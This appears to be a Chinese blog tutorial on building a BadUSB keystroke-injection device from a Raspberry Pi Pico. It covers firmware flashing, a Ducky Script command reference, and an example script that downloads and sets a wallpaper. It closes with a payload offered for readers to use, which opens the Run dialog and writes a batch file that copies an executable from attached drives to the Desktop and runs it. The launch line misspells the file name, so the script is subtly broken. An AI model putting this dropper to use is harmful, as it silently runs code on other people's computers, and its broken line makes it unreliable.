使用树莓派做一个bad usb

参考视频:

作者:xsTaoo 标题:物理黑客工具 Bad USB 制作教程

原文章

首先在网上购买一个RP2024 Pico开发板

双核Cortex M0 主频有133MHz

USB Type-C

如果你买的是 PR2024 Pico W版本 还会多一个WiFi模块

需要准备一根数据线，插入后连接电脑，如果你的买的是安卓线，则需要四芯的，否则供电不足可能无法打开。

我买的是Type-C，插入后还是没有反应。

打开设备管理器，发现没有识别到未知设备，但是多了几个串口。

通过查看客服发送的连接教程，发现老师也遇到了同样的情况，这种情况通过自己安装驱动，来完成电脑对设备的识别。

但这是可以识别到未知设备，但没有在我的电脑里显示到设备时候的做法，我只能显示串口，所以我通过长按固件的Bootsel按钮，然后插入电脑，这样就可以显示出来设备了。

下载好提供的资料

首先刷入固件，将adafruit-circuitpython-raspberry_pi_pico-en_US-8.0.0.uf2 粘贴到固件内

然后固件断开，重连

将Bad USB复制到固件内，出现是否覆盖选择对

成功后，通过修改pauload.dd来实现插入Usb后自动操作的内容

关于Ducky Script的脚本和语法可以参考另一篇文章，这里我直接粘贴过来当然也可以访问原文章

Ducky Script的脚本和语法

GUI windows菜单键

WINDOWS windows菜单键

SHIFT shift键

ALT Alt键

CONTROL Ctrl键

CTRL Ctrl键

DOWNARROW 下箭头

DOWN 下箭头

LEFTARROW 左箭头

LEFT 左箭头

RIGHTARROW 右箭头

RIGHT 右箭头

UPARROW 上箭头

UP 上箭头

BREAK Pause键

PAUSE 和上一个是一样的

CAPSLOCK 大写键

DELETE 删除键

END END键，我估计你们不常用这个

ESC 键盘上左上角的键

ESCAPE 键盘上左上角的键

HOME Home键

INSERT Insert键

NUMLOCK 键盘锁键

PAGEUP 上翻页键

PAGEDOWN 下翻页键

PRINTSCREEN 屏幕截屏键

SCROLLLOCK 话说不写文档我都想不起键盘上还有这个键，Scrolllock键

SPACE 空格键，如果你延时把握的好，你甚至可以用这个指令玩炫舞

TAB 就是Tab键咯

REPEAT是一个很特殊指令，将下面的语句重复多少遍，举个例子。

REPEAT 100

STRING Hello World！

以上的代码块就是输出Hello World！这条语句一百次，无情的打字机器，对吧。

说点题外话，我这两天拍的教程中的设备，USB Ninja Pro还在以上基础上添加了一些功能，也就是几个新的脚本指令。我在这里也介绍下。

USBON 切换到Ninja的USB口，原本通道关闭

USBOFF 切换至原来的USB口，关闭Ninja的USB通道

CAPSLOCK ON 大写锁定，使用之后，保证电脑一直在大写锁定态

CAPSLOCK OFF 大写锁定关，保证电脑在非大写锁定态

PLUGAUTORUN 后面跟数字，下一次插入直接运行数字对应的SLOT里面存储的脚本

MSCREAD 手动将ROM里面的数据加载到RAM，也就是挂载U盘操作

MSCSAVE 手动将RAM里面的数据加载到ROM，也就是断开并保持U盘内容

MSCWIPE 擦除ROM盘里面的数据

MSCFORM 格式化ROM盘中的数据

MSCONOFF 后跟参数0或者1，为1时U盘功能启动

举个完整的例子吧。

REM This is a script to download and change the wallpaper in windows 10

REM In order to work, windows must be using the default app for opening photos

以上两句是注释行

DELAY 5000

延时5000ms，也就是五秒

CONTROL ESCAPE

Ctrl键加Esc键

DELAY 100

延时100ms

REM Note: The internet explorer method works usually for everyone but

REM If you want to use Chrome or Firefox instead of IE, remove ‘iexplorer’ from the following line

REM but also make sure to follow instructions bellow

又是三行注释

STRING iexplore http://www.thecuriosityworkshop.com/wp-content/uploads/2015/03/01-rubberduck-hongkong.jpg

使用ie打开一个网址

ENTER

回车

DELAY 4000

延时4秒

CONTROL s

Ctrl键加s键，也就是保存了

DELAY 2000

延时

ENTER

回车

DELAY 300

延时

CONTROL ESCAPE

Ctrl加ESC键

DELAY 300

延时

REM If you want to use Chrome, change ‘Documents’ to ‘Downloads’

REM If you want to use Firefox, change ‘Documents’ to ‘Pictures’

注释

STRING %USERPROFILE%\Documents\01-rubberduck-hongkong.jpg

输入了一条指令

DELAY 500

ENTER

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

TAB

DELAY 500

ENTER

DELAY 500

DOWN

DELAY 500

DOWN

DELAY 500

DOWN

DELAY 500

DOWN

DELAY 500

ENTER

DELAY 500

DOWN

DELAY 500

DOWN

DELAY 500

ENTER

DELAY 500

后面就是模拟键盘进行了一系列的选择了，最终，你的壁纸会被替换为上面网址中的图片。

我这里也放一段脚本，推荐你们自行理解并使用

MSCREAD

USBON

CAPSloCk On

GUI r

DELAY 500

STRING cmd /c echo “cmd /c ping 127.0.0.1 > nul && for %%i in (A B C D E F G H I J K) do copy %%i:\fuck.exe %USERPROFILE%\Desktop\fuck.exe && start %USERPROFILE%\Desktop\fuvk.exe” > %Temp%\a.bat && %Temp%\a.bat

ENTER

CAPSloCk Off

DELAY 5000

REPEAT 2

USBOFF

玩的开心XD

作者：无序熵增 https://www.bilibili.com/read/cv5472965/?from=search&spm_id_from=333.337.0.0 出处：bilibili